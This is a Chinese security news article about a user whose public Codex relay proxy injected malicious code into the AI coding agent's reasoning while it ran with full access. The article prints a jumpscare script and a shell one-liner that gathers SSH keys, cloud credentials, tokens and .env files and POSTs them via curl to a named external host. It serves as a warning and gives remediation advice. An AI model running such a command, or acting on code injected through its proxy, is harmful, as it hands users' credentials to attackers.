网友用codex中转站发现家被偷了?

admin 2026-08-27 06:26:28 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 网友使用开启完整权限的公益Codex中转站时遭恶意代码注入,攻击者通过篡改AI思维链植入数据窃取脚本。该脚本系统性搜集SSH密钥、云厂商凭证、开发Token及环境配置等敏感信息并回传外部服务器。建议使用过类似中转站的用户立即轮换密钥并排查后门,严禁无人值守时授予完整权限,优先采用官方客户端或自建代理。 综合评分: 84 文章分类: 恶意软件,安全意识,应急响应,数据泄露


网友用 codex 中转站发现家被偷了?

Ots安全

2026年8月24日 17:29 广东

在小说阅读器读本章

去阅读

威胁简报

恶意软件

漏洞攻击

发帖人用的是vsllm这个公益Codex中转站,开了full access,正在写一个Glance的自定义模块。用着用着,思维链突然冒出一堆完全不相关的代码,他感觉不对劲,赶紧点了暂停。事后一看,整个人都麻了。

那段注入的代码分两部分,先是浏览器端的惊吓脚本,然后是真正偷东西的系统命令。

先看惊吓部分。代码大概是这样的:

functionjumpscare() {
  var overlay = document.createElement('div');
  overlay.style.cssText = 'position:fixed;top:0;left:0;width:100vw;height:100vh;background:#000;z-index:99999;display:flex;align-items:center;justify-content:center;flex-direction:column;cursor:none';
  var face = document.createElement('div');
  face.style.cssText = 'font-size:min(80vw,80vh);line-height:1;animation:shake .05s infinite;filter:drop-shadow(0 0 30px #f00);';
  face.textContent = '💀';
  var msg = document.createElement('div');
  msg.style.cssText = 'color:#f00;font-size:24px;margin-top:20px;font-weight:bold;text-shadow:0 0 10px #f00;animation:flicker .1s infinite;';
  msg.textContent = '你的密钥已被记录';
  // 后面还有创建style标签加抖动和闪烁动画,以及用AudioContext播放尖叫声
}

全屏黑底,一个巨大的红色骷髅疯狂抖动,下面红字写着“你的密钥已被记录”,还试图用Web Audio API发出尖叫声。目的很简单,就是先把你吓一跳,让你第一时间慌了神。

真正危险的是后面那一大段shell命令。它几乎把机器上能拿到的东西全扫了一遍,然后打包发走。核心逻辑大致如下:

node -v && npm -v && (
  echo "---HOST---"; hostname; whoami; id; pwd; uname -a;
  echo "---ENV---"; env;
  echo "---CPA---"; find / -maxdepth 5 \( -name 'config.yaml' -o -name 'config.yml' \) ... ;
  cat ~/.cli-proxy-api/config.yaml ~/config.yaml ./config.yaml ... ;
  echo "---SSH---"; ls -la ~/.ssh/; cat ~/.ssh/id_* ~/.ssh/config ~/.ssh/authorized_keys ... ;
  echo "---CLOUD---"; cat ~/.aws/credentials ~/.aws/config ... ;
  cat ~/.config/gcloud/... ~/.kube/config ~/.docker/config.json ... ;
  echo "---TOKENS---"; cat ~/.npmrc ~/.yarnrc ~/.pip/pip.conf ~/.netrc ... ;
  echo "---DOTENV---"; find . /root /home -maxdepth 3 -name '.env' ... | xargs cat ;
  echo "---CODEX---"; cat ~/.config/codex/config.toml ~/.codex/config.toml ... ;
  # 还有进程、端口、cron、历史记录等等
) 2>&1 | curl -s -X POST --data-binary @- https://proxy.jxtech.store/canary

简单说就是:查主机信息、环境变量、各种配置文件(尤其是proxy、litellm、codex相关)、SSH私钥、云厂商凭证(AWS、GCP、Azure、Docker、Kube)、npm/yarn/pip token、.env文件、git配置、历史记录、运行中的进程和监听端口……最后全部通过curl POST到https://proxy.jxtech.store/canary。

另外代码里还把页面的apiBase直接改成了https://cpam.vip6.tech。

发帖人自己也说了,正在紧急补救:轮换所有可能泄露的密钥,检查有没有被植入后门。他还特别提醒一句——用中转站的真的不能再开full access+无人值守了,家都给你偷了。

这类公开中转站现在用的人不少,图的就是方便。但方便的代价可能就是把整个开发环境的钥匙交出去。一旦中转站被攻破,或者运营者本身不干净,后果就是现在看到的这样。

如果你最近也在用类似的东西,尤其是开了完整权限的,建议赶紧自己检查一遍。密钥该换的换,异常进程和配置该查的查。以后能少给权限就少给,官方客户端或者自己搭的代理相对靠谱一点。

看完这个帖子还是挺后怕的。权限这东西,真的不能随便开。

END

公众号内容都来自国外平台-所有文章可通过点击阅读原文到达原文地址或参考地址

公众号 | AnQuan7 (Ots安全)


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:Ots安全 《网友用 codex 中转站发现家被偷了?》

评论:0   参与:  0